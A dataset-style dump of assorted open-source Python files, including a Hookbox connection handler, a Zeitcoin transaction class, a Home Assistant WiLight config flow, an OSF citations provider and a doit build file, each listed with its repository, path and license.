code
stringlengths 3
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 3
1.05M
|
|---|---|---|---|---|---|
import logging
import uuid
import eventlet
from errors import ExpectedException
import rtjp_eventlet
class HookboxConn(object):
logger = logging.getLogger('HookboxConn')
def __init__(self, server, rtjp_conn, config, remote_addr):
self._rtjp_conn = rtjp_conn
self.server = server
self.state = 'initial'
self.cookies = None
self.cookie_string = None
self.cookie_id = None
self.cookie_identifier = config['cookie_identifier']
self.id = str(uuid.uuid4()).replace('-', '')
self.user = None
self.remote_addr = remote_addr
def serialize(self):
return {
"id": self.id,
"user": self.user and self.user.get_name(),
"cookie": self.cookie_string
}
def send_frame(self, *args, **kw):
try:
self._rtjp_conn.send_frame(*args, **kw).wait()
except Exception, e:
if 'closed' in str(e).lower():
pass
else:
self.logger.warn("Unexpected error: %s", e, exc_info=True)
def send_error(self, *args, **kw):
return self._rtjp_conn.send_error(*args, **kw)
def get_cookie(self):
return self.cookie_string
def get_id(self):
return self.id
def get_cookie_id(self):
return self.cookie_id
def get_remote_addr(self):
return self.remote_addr
def _close(self):
if self.state == 'connected':
self.server.closed(self)
def run(self):
while True:
try:
# print 'read a frame...'
self.logger.debug('%s waiting for a frame', self)
fid, fname, fargs= self._rtjp_conn.recv_frame().wait()
# print 'got frame', fid, fname, fargs
except rtjp_eventlet.errors.ConnectionLost, e:
self.logger.debug('received connection lost error')
# print 'connection lost'
break
except:
# print 'some error..'
self.logger.warn("Error reading frame", exc_info=True)
continue
f = getattr(self, 'frame_' + fname, None)
if f:
try:
f(fid, fargs)
except ExpectedException, e:
self.send_error(fid, e)
except Exception, e:
self.logger.warn("Unexpected error: %s", e, exc_info=True)
self.send_error(fid, e)
else:
self._default_frame(fid, fname, fargs)
# print 'all DONE!'
# cleanup
self.logger.debug('loop done')
if self.user:
self.logger.debug('cleanup user')
# print 'go call remove connection'
self.user.remove_connection(self)
self.server.disconnect(self)
def _default_frame(fid, fname, fargs):
pass
def frame_CONNECT(self, fid, fargs):
if self.state != 'initial':
return self.send_error(fid, "Already logged in")
if 'cookie_string' not in fargs:
raise ExpectedException("Missing cookie_string")
self.cookie_string = fargs['cookie_string']
self.cookies = parse_cookies(fargs['cookie_string'])
self.cookie_id = self.cookies.get(self.cookie_identifier, None)
self.server.connect(self)
self.state = 'connected'
self.send_frame('CONNECTED', { 'name': self.user.get_name() })
def frame_SUBSCRIBE(self, fid, fargs):
if self.state != 'connected':
return self.send_error(fid, "Not connected")
if 'channel_name' not in fargs:
return self.send_error(fid, "channel_name required")
channel = self.server.get_channel(self, fargs['channel_name'])
channel.subscribe(self.user, conn=self)
def frame_UNSUBSCRIBE(self, fid, fargs):
if self.state != 'connected':
return self.send_error(fid, "Not connected")
if 'channel_name' not in fargs:
return self.send_error(fid, "channel_name required")
channel = self.server.get_channel(self, fargs['channel_name'])
channel.unsubscribe(self.user, conn=self)
def frame_PUBLISH(self, fid, fargs):
if self.state != 'connected':
return self.send_error(fid, "Not connected")
if 'channel_name' not in fargs:
return self.send_error(fid, "channel_name required")
channel = self.server.get_channel(self, fargs['channel_name'])
channel.publish(self.user, fargs.get('payload', 'null'), conn=self)
def frame_MESSAGE(self, fid, fargs):
if self.state != 'connected':
return self.send_error(fid, "Not connected")
if 'name' not in fargs:
return self.send_error(fid, "name required")
self.user.send_message(fargs['name'], fargs.get('payload', 'null'), conn=self)
def parse_cookies(cookieString):
output = {}
for m in cookieString.split('; '):
try:
k,v = m.split('=', 1)
output[k] = v
except:
continue
return output
|
gameclosure/hookbox
|
hookbox/protocol.py
|
Python
|
mit
| 5,241
|
#!/usr/bin/env python
#########################################
# Zeitcoin Transaction Class
#########################################
import sys
from zeitcoindb import hashtable
from zeitcoinutility import utility,encyption
class transactions:
# Will handle transactions
# Transaction (format)
# | Previous hash value (32 bytes)| length of sender script (4 bytes) | sender script | receiver address (32 bytes) # | length of receiver script (4 bytes) | receiver script | length of optional message (4 bytes) | message |
# Transaction Block Table:
# thash - hash of the transaction (32 byte hash)
# transactionscript - The whole formated transaction as listed above
# timestamp - the time the transaction was received
def __init__(self,filename,address,port):
self.filename = filename
self.address = address
self.port = port
def decodetransaction(self,thash):
previousthash=thash[:32]
hexlensender=thash[32:36]
lensender = int(hexlensender, 16)*2
senderscript=thash[36:36+lensender]
receiveraddress=thash[36+lensender:68+lensender]
hexlenreceiver=thash[68+lensender:72+lensender]
#print "hexlenreceiver = ", hexlenreceiver
lenreceiver=int(hexlenreceiver,16)*2
receiverscript=thash[72+lensender:72+lensender+lenreceiver]
hexlenmessage=thash[72+lensender+lenreceiver:76+lensender+lenreceiver]
lenmessage=int(hexlenmessage,16)*2
message=thash[76+lensender+lenreceiver:76+lensender+lenreceiver+lenmessage]
return previousthash,lensender,senderscript.decode("hex"), receiveraddress,lenreceiver,receiverscript.decode("hex"), lenmessage,message.decode("hex")
def formattransaction(self,previousthash,senderscript,receiverscript,receiveraddress,message):
lpreviousthash=len(previousthash)
if (lpreviousthash!=32):
print "[Error] - The previous thash is not a valid 32 byte hash"
lreceiveraddress=len(receiveraddress)
if (lreceiveraddress!=32):
print "[Error] - The receiver address is not a valid zietcoin address"
lensender=len(senderscript)
if (lensender>4294967296):
print "[Error] - The sender script is too long"
lenreceiver=len(receiverscript)
if (lenreceiver>4294967296):
print "[Error] - The receiver script is too long"
lenmessage=len(message)
if (lenmessage>4294967296):
print "[Error] - The message is too long"
lsender = self.formatint2hex(lensender,4)
lreceiver = self.formatint2hex(lenreceiver,4)
lmessage = self.formatint2hex(lenmessage,4)
hexsender=self.formatstr2hex(senderscript)
hexreceiver=self.formatstr2hex(receiverscript)
hexmessage=self.formatstr2hex(message)
print "lsender for tx = ",lsender
print "hexsender for tx = ",hexsender
print "address for tx = ",receiveraddress
print "lreceiver for tx = ",lreceiver
print "hexreceiver for tx = ",hexreceiver
print "lmessage for tx = ",lmessage
print "hexmessage for tx = ",hexmessage
transaction=str(previousthash)+str(lsender)+str(hexsender)+str(receiveraddress)+str(lreceiver)+str(hexreceiver)+str(lmessage)+str(hexmessage)
return transaction
def formatint2hex(self,int1,fill):
hex1=format(int(int1),'x')
hex1=hex1.zfill(fill)
return hex1
def formatstr2hex(self,str1):
hexstr=''
for c in str1:
int1=ord(c)
hex1 = self.formatint2hex(int1,2)
hexstr+=hex1
return hexstr
def getreceivedcoins(self):
# Go throught the transaction block and find all coins owned by the wallet with a certain guid
# will return the number of coins that can be sent by the owner of the wallet
# probably will want to do this method in a thread as it might take a long time
ht=hashtable()
dbpool=ht.tconnectdb(self.filename)
d = defer.Deferred()
d.addCallback(ht.tgetalltb)
d.addCallback(ht.tgetallaccount)
d.addCallback(self._getreceivedcoins,ht,dbpool)
d.callback(dbpool)
return
def _getreceivedcoins(self,tblist,accountlist):
coinlist=[]
for tx in tblist:
previousthash,lensender,senderscript, receiveraddress,lenreceiver,receiverscript, lenmessage, message = self.decodetransaction(tx[1])
for a in account:
if (a[0]==receiveraddress):
list1=[]
list1.append(receiveraddress)
list1.append(a[3])
list1.append(tx[0])
coinlist.append(list1)
return coinlist
def getunspentcoins(self, coinlist,tblist):
# Will go throught the transaction block and find all the coins that can be spent by the wallet
# Will return the thast of all the coins that is owned
# probably will want to do this method in a thread due to the time it might take
coinlist1=[]
for tx in tblist:
previousthash,lensender,senderscript, receiveraddress,lenreceiver,receiverscript, lenmessage, message = self.decodetransaction(tx[1])
flag=0
for c in coinlist:
if (c[2]==previousthash):
flag=1
if flag==0:
coinlist1.append(c)
return coinlist1
def getaddressofsender(self,thash,tblist):
# Will go through the transaction block and return the address of the sender of that thash (thread)
previousthash1,lensender,senderscript, receiveraddress,lenreceiver,receiverscript, lenmessage,message = self.decodetransaction(thash)
for tx in tblist:
if (tx[0]==previousthash):
previousthash,lensender,senderscript, receiveraddress,lenreceiver,receiverscript, lenmessage,message = self.decodetransaction(tx)
break;
return receiveraddress
def getaddressofreceiver(self,thash):
# Will go through the transaction block and return the receiver address of a thash (thread)
previousthash1,lensender,senderscript, receiveraddress,lenreceiver,receiverscript, lenmessage,message = self.decodetransaction(thash)
return receiveraddress
def receivedtrans(self,coinhash,receiveraddress,message):
# received a new transaction from a person trying to send a coin
# will call sendcoin after the client finish the guided tour
return
def sendtrans(self):
# send a transaction to the network
return
def sendcoin(self,coinhash,receiveraddrress,message):
# send a coin to a certain address
# check to make sure this wallet owns this coin
# receiveraddress - first 32 bytes wallet guid | last 32 bytes will be the address that is stored in tb
# get the wallet guid and get its address and port
# zt=Zeit()
# zt=sendcoin(address,port,receiveraddress,coinhash,message)
return
def hashtransaction(self,tx):
# format a transaction
result=hashlib.sha256(tx).hexdigest()
return result
def checkvalidtx(self,receiveraddress,senderaddress,previoushash,txid,thash):
# Create local transaction list that holds: txid, thash, addresswallet,addressother, amount, timestamp
# check if the sender the valid owner of the coin
# check to see if the previous hash exist
# Check to see if the transaction is valid over-all.
return
def checktransaction(self,inputtx,outputtx):
# check the input and output side of the transaction (returns true or false)
result==False
zf=zietforth()
res1=zf.execute(inputtx)
res2=zf.execute(outputtx)
if (res1==True and res2==True):
result=True
return result
def broadcasttrans(self,txid,thash,ts):
# broadcast a valid transaction to all nodes
# node that did the transaction will broadcast to everyone on its hash table.
# everyone that receive this broadcast will rebroadcast to its farest peer and its closest peer
ut=utility(self.filename,self.address,self.port)
ut.boardcasttrans(txid,thash,ts)
return
def acceptcoin(self,txid,thash,addresswallet,addressother,timestamp):
# store it in the local transaction table
# update balance txid,thash,addresswallet,addressother,amount,type1,time1
amount=1
type1="received"
self.storetransaction(txid,thash,addresswallet,otheraddress,amount,type1,timestamp)
print "new coin was accepted with txid="+str(txid)+" thash="+thash+" ts="+str(timestamp)
return
def storetransaction(self,txid,thash,addresswallet,otheraddress,amount,type1,timestamp):
# store the transaction in the database
global FNAME
ht=hashtable()
#conn,c=ht.connectdb(FNAME)
dbpool=ht.tconnectdb(FNAME)
#ht=addtb(conn,c,txid,thash,time1)
wfd = defer.waitForDeferred(ht.taddtb(dbpool,txid,thash,timestamp))
yield wfd
wfd = defer.waitForDeferred(ht.taddlt(dbpool,txid,thash,addresswallet,addressother,amount,type1,timestamp))
yield wfd #tgetnewbalance(self,dbpool)
wfd = defer.waitForDeferred(ht.tgetnewbalance(dbpool))
yield wfd
balance = wfd.getResult()
wfd = defer.waitForDeferred(ht.tupdatebalance(self,dbpool,balance,guid))
yield wfd #tupdatebalance(self,dbpool,balance,guid)
ht.tclosedb(dbpool)
return
def main():
print "Testing the Transaction class"
sys.exit(0)
if __name__ == '__main__':
main()
#Generation of new coin:
#senderscript:
#push signcoinhash - sign the coinhash with the peer generating the key private key
#push publickey - public key from the peer generating the coin
#verifysign
#receiveraddress - guid of receiver:account address
#receiverscript:
#push coinhash - getguid
#push signcoinhash1 - sign with receiver of the coin public key
#decode signcoinhash1
#eq signcoinhash1 = decodecoinhash
#and 1 and 1
#verify
#push signcoinhash [signcoinhash]
#push publickey [signcoinhash, publickey]
#versign signcoinhash and pubkey [true]
#push coinhash [true,coinhash]
#push signcoinhash1 [true, coinhash, signcoinhash1]
#decode signcoinhash1 [true, coinhash, decodecoinhash]
#eq coinhash=decodecoinhash [true, true]
#and (1 and 1) [true]
#verify return true []
#============================================================================
#push coinhash [coinhash]
#push signcoinhash [coinhash, signcoinhash]
#decode signcoinhash [coinhash, decodecoinhash]
#eq coinhash = decodecoinhash [true]
#verify []
|
mmgrant73/zeitcoin
|
zeitcointrans.py
|
Python
|
mit
| 9,705
|
import pygame
import pygame.locals
from pygame.locals import *
if __name__ == "__main__":
# CODE MODIFICATION!
# We're down to just what we need at the moment.
pygame.init()
pygame.display.set_caption('Petri Dish')
pygame.quit()
|
jeremyosborne/python
|
third_party/pygame/02_petri/petri.py
|
Python
|
mit
| 274
|
# import pytest
# import pandas as pd
# import numpy as np
# import pkg_resources, os
# from io import StringIO
# from epic.scripts.overlaps.overlaps import (_compute_region_overlap,
# _create_overlap_matrix_regions)
# from epic.config.genomes import (create_genome_size_dict,
# get_effective_genome_length)
# __author__ = "Endre Bakken Stovner https://github.com/endrebak/"
# __license__ = "MIT"
# @pytest.fixture
# def region_matrixes(epic_overlap_intermediate_region_matrixes):
# return [pd.read_table(f, sep=" ", index_col=0) for f in epic_overlap_intermediate_region_matrixes]
# @pytest.fixture
# def expected_result_region_overlap():
# df = pd.read_table("examples/epic-overlaps/region_overlap_result.csv", sep=" ", index_col=0)
# return df
# @pytest.mark.current
# def test__compute_region_overlap(region_matrixes, expected_result_region_overlap):
# region_matrix = region_matrixes[0]
# df = _compute_region_overlap(region_matrix)
# print(df)
# # df.to_csv("examples/epic-overlaps/region_overlap_result.csv", sep=" ")
# # print(df)
# assert df.equals(expected_result_region_overlap)
# @pytest.fixture
# def expected_result_intermediate_region_matrix(epic_overlap_intermediate_region_matrixes):
# df = pd.read_table(epic_overlap_intermediate_region_matrixes[0], sep=" ", index_col=0)
# return df
|
endrebak/epic
|
tests/scripts/test_overlaps.py
|
Python
|
mit
| 1,447
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
from streamcorpus import make_stream_item
from streamcorpus_pipeline._title import title
from streamcorpus_pipeline._clean_visible import clean_visible
def test_title():
stage = title({})
cv = clean_visible({})
si = make_stream_item(0, '')
si.body.clean_html = '''Then there
was a
<tag> ... <title>TITLE
HERE
</title>
'''
si = cv(si, {})
si = stage(si)
assert si.other_content['title'].clean_visible == 'TITLE HERE'
si = make_stream_item(0, '')
si.body.clean_html = '''Then there
was a
that went <tag> ... <title>TITLE
HERE%s
</title>
''' % ('*' * 80)
si = cv(si, {})
si = stage(si)
assert si.other_content['title'].clean_visible == 'TITLE HERE' + '*' * 50 + '...'
def test_title_unicode_clean_html():
# The trick is to make the 60th byte end at a non-character boundary.
# Use the snowman (3 byte encoding) and some foreign character (4 byte
# encoding). Since 7 does not divide 60, the 60th byte will be in the
# middle of an encoded codepoint.
foreign_snowmen = u'☃𠜎' * 100
stage = title({})
cv = clean_visible({})
si = make_stream_item(0, '')
si.body.clean_html = '<title>%s</title>' % foreign_snowmen.encode('utf-8')
si = cv(si, {})
si = stage(si)
got = si.other_content['title'].clean_visible.decode('utf-8')
assert len(foreign_snowmen[0:60]) + 3 == len(got)
assert foreign_snowmen[0:60] + '...' == got
def test_title_unicode_clean_visible():
# The trick is to make the 200th byte end at a non-character boundary.
# Use the snowman (3 byte encoding) and some foreign character (4 byte
# encoding). Since 7 does not divide 200, the 200th byte will be in the
# middle of an encoded codepoint.
foreign_snowmen = u'☃𠜎' * 100
stage = title({})
cv = clean_visible({})
si = make_stream_item(0, '')
si.body.clean_html = None
si.body.clean_visible = '%s' % foreign_snowmen.encode('utf-8')
si = stage(si)
got = si.other_content['title'].clean_visible.decode('utf-8')
assert len(foreign_snowmen[0:60]) + 3 == len(got)
assert foreign_snowmen[0:60] + '...' == got
|
trec-kba/streamcorpus-pipeline
|
streamcorpus_pipeline/tests/test_title.py
|
Python
|
mit
| 2,239
|
"""Config flow to configure WiLight."""
from urllib.parse import urlparse
import pywilight
from homeassistant.components import ssdp
from homeassistant.config_entries import ConfigFlow
from homeassistant.const import CONF_HOST
from . import DOMAIN
CONF_SERIAL_NUMBER = "serial_number"
CONF_MODEL_NAME = "model_name"
WILIGHT_MANUFACTURER = "All Automacao Ltda"
# List the components supported by this integration.
ALLOWED_WILIGHT_COMPONENTS = ["cover", "fan", "light"]
class WiLightFlowHandler(ConfigFlow, domain=DOMAIN):
"""Handle a WiLight config flow."""
VERSION = 1
def __init__(self):
"""Initialize the WiLight flow."""
self._host = None
self._serial_number = None
self._title = None
self._model_name = None
self._wilight_components = []
self._components_text = ""
def _wilight_update(self, host, serial_number, model_name):
self._host = host
self._serial_number = serial_number
self._title = f"WL{serial_number}"
self._model_name = model_name
self._wilight_components = pywilight.get_components_from_model(model_name)
self._components_text = ", ".join(self._wilight_components)
return self._components_text != ""
def _get_entry(self):
data = {
CONF_HOST: self._host,
CONF_SERIAL_NUMBER: self._serial_number,
CONF_MODEL_NAME: self._model_name,
}
return self.async_create_entry(title=self._title, data=data)
async def async_step_ssdp(self, discovery_info):
"""Handle a discovered WiLight."""
# Filter out basic information
if (
ssdp.ATTR_SSDP_LOCATION not in discovery_info
or ssdp.ATTR_UPNP_MANUFACTURER not in discovery_info
or ssdp.ATTR_UPNP_SERIAL not in discovery_info
or ssdp.ATTR_UPNP_MODEL_NAME not in discovery_info
or ssdp.ATTR_UPNP_MODEL_NUMBER not in discovery_info
):
return self.async_abort(reason="not_wilight_device")
# Filter out non-WiLight devices
if discovery_info[ssdp.ATTR_UPNP_MANUFACTURER] != WILIGHT_MANUFACTURER:
return self.async_abort(reason="not_wilight_device")
host = urlparse(discovery_info[ssdp.ATTR_SSDP_LOCATION]).hostname
serial_number = discovery_info[ssdp.ATTR_UPNP_SERIAL]
model_name = discovery_info[ssdp.ATTR_UPNP_MODEL_NAME]
if not self._wilight_update(host, serial_number, model_name):
return self.async_abort(reason="not_wilight_device")
# Check if all components of this WiLight are allowed in this version of the HA integration
component_ok = all(
wilight_component in ALLOWED_WILIGHT_COMPONENTS
for wilight_component in self._wilight_components
)
if not component_ok:
return self.async_abort(reason="not_supported_device")
await self.async_set_unique_id(self._serial_number)
self._abort_if_unique_id_configured(updates={CONF_HOST: self._host})
self.context["title_placeholders"] = {"name": self._title}
return await self.async_step_confirm()
async def async_step_confirm(self, user_input=None):
"""Handle user-confirmation of discovered WiLight."""
if user_input is not None:
return self._get_entry()
return self.async_show_form(
step_id="confirm",
description_placeholders={
"name": self._title,
"components": self._components_text,
},
errors={},
)
|
aronsky/home-assistant
|
homeassistant/components/wilight/config_flow.py
|
Python
|
apache-2.0
| 3,621
|
# -*- coding: utf-8 -*-
from ofrestapi.users import Users
from ofrestapi.muc import Muc
from ofrestapi.system import System
from ofrestapi.groups import Groups
from ofrestapi.sessions import Sessions
from ofrestapi.messages import Messages
import pkg_resources
__version__ = pkg_resources.require("openfire-restapi")[0].version
|
Adarnof/openfire-restapi
|
ofrestapi/__init__.py
|
Python
|
gpl-3.0
| 330
|
#-*- coding: utf-8 -*-
# wellswidget.py
# Copyright (c) 2011, see AUTHORS
# All rights reserved.
# This file is part of ProfileExtractor.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# Neither the name of the ProfileExtractor nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR AN6Y DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#-*- coding: utf-8 -*-
from PySide import QtCore, QtGui
from PySide.QtCore import *
from PySide.QtGui import *
from lib.table import *
class WellItem(QtGui.QTreeWidgetItem):
"""
"""
def __init__(self, label, color, parent = None):
"""
"""
super(WellItem, self).__init__(parent)
self.setText(0, label)
self.setCheckState(0, Qt.Unchecked)
if color:
brush = QBrush(QColor.fromRgbF(color[0], color[1], color[2]))
self.setForeground(0, brush)
def __eq__(self, item):
"""
"""
return self.text(0) == item.text(0)
class WellsWidget(QtGui.QTreeWidget):
"""
"""
refreshProfile = QtCore.Signal(list, list)
def __init__(self, parent = None):
"""
"""
super(WellsWidget, self).__init__(parent)
self.items = []
self.setSelectionMode(QAbstractItemView.ExtendedSelection)
self.itemClicked.connect(self.selectItem)
self.itemDoubleClicked.connect(self.doubleClick)
self.setHeaderHidden(True)
self.nWells = 0
self.nControls = 0
self.objects = []
self.controls = []
self.toDisplay = []
self.controlWells = []
self.items = []
def load(self, table):
"""
"""
# Empty treeWidget
while self.topLevelItemCount() > 0:
self.takeTopLevelItem(0)
self.items = []
self.nWells = 0
self.nControls = 0
self.objects = []
self.controls = []
self.toDisplay = []
self.controlWells = []
self.table = table
self.fill()
def fill(self):
"""
Fill tree widget with all well from the table
"""
tree = {}
self.table.zipIter = False
i = 0
for l in self.table.lineHeaders:
l = l.split(" -- ")
exp = l[0]
date = l[1]
well = l[2]
if exp not in tree.keys():
tree[exp] = {}
if date not in tree[exp]:
tree[exp][date] = []
tree[exp][date].append((well, self.table.colors[i]))
i += 1
for exp in tree:
expItem = WellItem(exp, None, None)
self.addTopLevelItem(expItem)
for date in tree[exp]:
dateItem = WellItem(date, None, expItem)
self.addTopLevelItem(dateItem)
for well, color in tree[exp][date]:
label = well
wellItem = WellItem(label, color, dateItem)
self.addTopLevelItem(wellItem)
self.items.append(wellItem)
self.objects.append(wellItem)
self.sortItems(0, Qt.AscendingOrder)
def selectItem(self, item = None):
"""
"""
if item:
newState = item.checkState(0)
for i in range(item.childCount()):
child = item.child(i)
child.setCheckState(0, newState)
if child.childCount() != 0:
for j in range(child.childCount()):
child.child(j).setCheckState(0, newState)
tmp = []
for i in self.items:
if i.checkState(0) == Qt.Checked:
name = i.parent().parent().text(0) + ' -- '
name += i.parent().text(0) + ' -- '
name += i.text(0)
tmp.append(name)
controls = []
for item in self.controls:
name = item.parent().parent().text(0) + ' -- '
name += item.parent().text(0) + ' -- '
name += item.text(0)
controls.append(name)
if self.nWells != len(tmp) or self.nControls != len(controls):
#self.refreshProfile.emit(tmp, controls)
self.toDisplay = tmp
self.nWells = len(tmp)
self.nControls = len(controls)
self.controlWells = controls
def doubleClick(self, item, column):
"""
"""
if item in self.controls:
self.controls.remove(item)
font = QFont()
font.setWeight(QFont.Normal)
item.setFont(0, font)
else:
self.controls.append(item)
font = QFont()
font.setWeight(QFont.Bold)
item.setFont(0, font)
self.selectItem()
def itemSignal(self, name, mode = 'singleClick'):
"""
"""
for i in self.items:
itemName = i.parent().parent().text(0) + ' -- '
itemName += i.parent().text(0) + ' -- '
itemName += i.text(0)
if name == itemName:
if mode == 'singleClick':
i.setCheckState(0, Qt.Checked)
self.itemClicked.emit(i, 0)
elif mode == 'doubleClick':
self.itemDoubleClicked.emit(i, 0)
self.selectItem()
|
hadim/profileextractor
|
src/ui/profiler/wellswidget.py
|
Python
|
bsd-3-clause
| 6,684
|
import abc
import httplib as http
from framework.exceptions import HTTPError
from framework.exceptions import PermissionsError
from website.oauth.models import ExternalAccount
class CitationsProvider(object):
__metaclass__ = abc.ABCMeta
def __init__(self, provider_name):
self.provider_name = provider_name
@abc.abstractproperty
def serializer(self):
pass
def check_credentials(self, node_addon):
valid = True
if node_addon.api.account:
try:
node_addon.api.client
except HTTPError as err:
if err.code == 403:
valid = False
else:
raise err
return valid
def user_accounts(self, user):
""" Gets a list of the accounts authorized by 'user' """
return {
'accounts': [
self.serializer(
user_settings=user.get_addon(self.provider_name) if user else None
).serialize_account(each)
for each in user.external_accounts
if each.provider == self.provider_name
]
}
def set_config(self, node_addon, user, external_list_id, external_list_name, auth):
# Ensure request has all required information
node_addon.set_target_folder(external_list_id, external_list_name, auth)
def add_user_auth(self, node_addon, user, external_account_id):
external_account = ExternalAccount.load(external_account_id)
if external_account not in user.external_accounts:
raise HTTPError(http.FORBIDDEN)
try:
node_addon.set_auth(external_account, user)
except PermissionsError:
raise HTTPError(http.FORBIDDEN)
result = self.serializer(
node_settings=node_addon,
user_settings=user.get_addon(self.provider_name),
).serialized_node_settings
result['validCredentials'] = self.check_credentials(node_addon)
return {'result': result}
def remove_user_auth(self, node_addon, user):
node_addon.clear_auth()
node_addon.reload()
result = self.serializer(
node_settings=node_addon,
user_settings=user.get_addon(self.provider_name),
).serialized_node_settings
return {'result': result}
def widget(self, node_addon):
ret = node_addon.config.to_json()
ret.update({
'complete': node_addon.complete,
})
return ret
def _extract_folder(self, folder):
folder = self._folder_to_dict(folder)
ret = {
'name': folder['name'],
'provider_list_id': folder['list_id'],
'id': folder['id'],
}
if folder['parent_id']:
ret['parent_list_id'] = folder['parent_id']
return ret
@abc.abstractmethod
def _folder_to_dict(self, data):
pass
@abc.abstractmethod
def _folder_id(self):
return None
def citation_list(self, node_addon, user, list_id, show='all'):
attached_list_id = self._folder_id(node_addon)
account_folders = node_addon.api.citation_lists(self._extract_folder)
# Folders with 'parent_list_id'==None are children of 'All Documents'
for folder in account_folders:
if folder.get('parent_list_id') is None:
folder['parent_list_id'] = 'ROOT'
node_account = node_addon.external_account
user_accounts = [
account for account in user.external_accounts
if account.provider == self.provider_name
] if user else []
user_is_owner = node_account in user_accounts
# verify this list is the attached list or its descendant
if not user_is_owner and (list_id != attached_list_id and attached_list_id is not None):
folders = {
(each['provider_list_id'] or 'ROOT'): each
for each in account_folders
}
if list_id is None:
ancestor_id = 'ROOT'
else:
ancestor_id = folders[list_id].get('parent_list_id')
while ancestor_id != attached_list_id:
if ancestor_id is '__':
raise HTTPError(http.FORBIDDEN)
ancestor_id = folders[ancestor_id].get('parent_list_id')
contents = []
if list_id is None:
contents = [node_addon.root_folder]
else:
user_settings = user.get_addon(self.provider_name) if user else None
if show in ('all', 'folders'):
contents += [
self.serializer(
node_settings=node_addon,
user_settings=user_settings,
).serialize_folder(each)
for each in account_folders
if each.get('parent_list_id') == list_id
]
if show in ('all', 'citations'):
contents += [
self.serializer(
node_settings=node_addon,
user_settings=user_settings,
).serialize_citation(each)
for each in node_addon.api.get_list(list_id)
]
return {
'contents': contents
}
|
KAsante95/osf.io
|
website/addons/citations/provider.py
|
Python
|
apache-2.0
| 5,390
|
"""dodo file. test + management stuff"""
import glob
import os
import pytest
from doitpy.pyflakes import Pyflakes
from doitpy.coverage import Config, Coverage, PythonPackage
from doitpy import docs
from doitpy.package import Package
DOIT_CONFIG = {
'minversion': '0.24.0',
'default_tasks': ['pyflakes', 'ut'],
# 'backend': 'sqlite3',
}
CODE_FILES = glob.glob("doit/*.py")
TEST_FILES = glob.glob("tests/test_*.py")
TESTING_FILES = glob.glob("tests/*.py")
PY_FILES = CODE_FILES + TESTING_FILES
def task_pyflakes():
flaker = Pyflakes()
yield flaker('dodo.py')
yield flaker.tasks('doit/*.py')
yield flaker.tasks('tests/*.py')
def run_test(test):
return not bool(pytest.main([test]))
#return not bool(pytest.main("-v " + test))
def task_ut():
"""run unit-tests"""
for test in TEST_FILES:
yield {'name': test,
'actions': [(run_test, (test,))],
'file_dep': PY_FILES,
'verbosity': 0}
def task_coverage():
"""show coverage for all modules including tests"""
cov = Coverage([PythonPackage('doit', 'tests')],
config=Config(branch=False, parallel=True,
concurrency='multiprocessing',
omit=['tests/myecho.py', 'tests/sample_process.py'],)
)
yield cov.all()
yield cov.src()
yield cov.by_module()
############################ website
DOC_ROOT = 'doc/'
DOC_BUILD_PATH = DOC_ROOT + '_build/html/'
def task_rm_index():
"""remove/clean copied index.html if source changed"""
# work around https://github.com/sphinx-doc/sphinx/issues/1649
return {
'actions': ['cd doc && make clean'],
'file_dep': ['doc/index.html'],
}
def task_docs():
doc_files = glob.glob('doc/*.rst')
doc_files += ['README.rst', 'CONTRIBUTING.md',
'doc/open_collective.md']
yield docs.spell(doc_files, 'doc/dictionary.txt')
sphinx_opts = "-A include_analytics=1 -A include_donate=1"
yield docs.sphinx(DOC_ROOT, DOC_BUILD_PATH, sphinx_opts=sphinx_opts,
task_dep=['spell', 'rm_index'])
def task_samples_check():
"""check samples are at least runnuable without error"""
black_list = [
'longrunning.py', # long running doesn't terminate on its own
'settrace.py',
'download.py', # uses network
'taskresult.py', # uses mercurial
'tar.py', # uses mercurial
'calc_dep.py', # uses files not created by the script
'report_deps.py', # uses files not created by the script
'doit_config.py', # no tasks defined
]
exclude = set('doc/samples/{}'.format(m) for m in black_list)
arguments = {'doc/samples/pos.py': 'pos_args -p 4 foo bar'}
for sample in glob.glob("doc/samples/*.py"):
if sample in exclude:
continue
args = arguments.get(sample, '')
yield {
'name': sample,
'actions': ['doit -f {} {}'.format(sample, args)],
}
def task_website():
"""dodo file create website html files"""
return {'actions': None,
'task_dep': ['sphinx', 'samples_check'],
}
def task_website_update():
"""update website on SITE_PATH
website is hosted on github-pages
this task just copy the generated content to SITE_PATH,
need to commit/push to deploy site.
"""
SITE_PATH = '../doit-website'
SITE_URL = 'pydoit.org'
return {
'actions': [
"rsync -avP %s %s" % (DOC_BUILD_PATH, SITE_PATH),
"echo %s > %s" % (SITE_URL, os.path.join(SITE_PATH, 'CNAME')),
"touch %s" % os.path.join(SITE_PATH, '.nojekyll'),
],
'task_dep': ['website'],
}
def task_package():
"""create/upload package to pypi"""
pkg = Package()
yield pkg.revision_git()
yield pkg.manifest_git()
yield pkg.sdist()
# yield pkg.sdist_upload()
# doit -f ../doit-recipes/deps/deps.py -d . --reporter=executed-only
|
JohannesBuchner/doit
|
dodo.py
|
Python
|
mit
| 4,042
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
